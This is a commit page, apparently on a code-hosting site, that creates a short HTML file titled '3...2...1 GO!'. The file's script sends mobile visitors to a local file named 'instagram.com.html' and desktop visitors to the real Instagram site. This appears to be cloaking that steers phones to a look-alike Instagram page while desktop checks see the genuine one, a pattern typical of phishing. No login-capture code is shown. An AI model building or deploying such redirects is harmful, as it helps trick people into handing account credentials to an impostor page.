dfhfhfgg commited on
Commit
1170839
·
verified ·
1 Parent(s): 7e6a9df

Create mobile.html

Browse files
Files changed (1) hide show
  1. mobile.html +21 -0
mobile.html ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html lang="es">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <title>3...2...1 GO!</title>
6
+ </head>
7
+ <body>
8
+
9
+ <script>
10
+ function gopc() {
11
+ if (/Mobi|Android/i.test(navigator.userAgent)) {
12
+ window.location.href = './instagram.com.html';
13
+ } else {
14
+ window.location.href = 'https://www.instagram.com/';
15
+ }
16
+ }
17
+
18
+ gopc();
19
+ </script>
20
+ </body>
21
+ </html>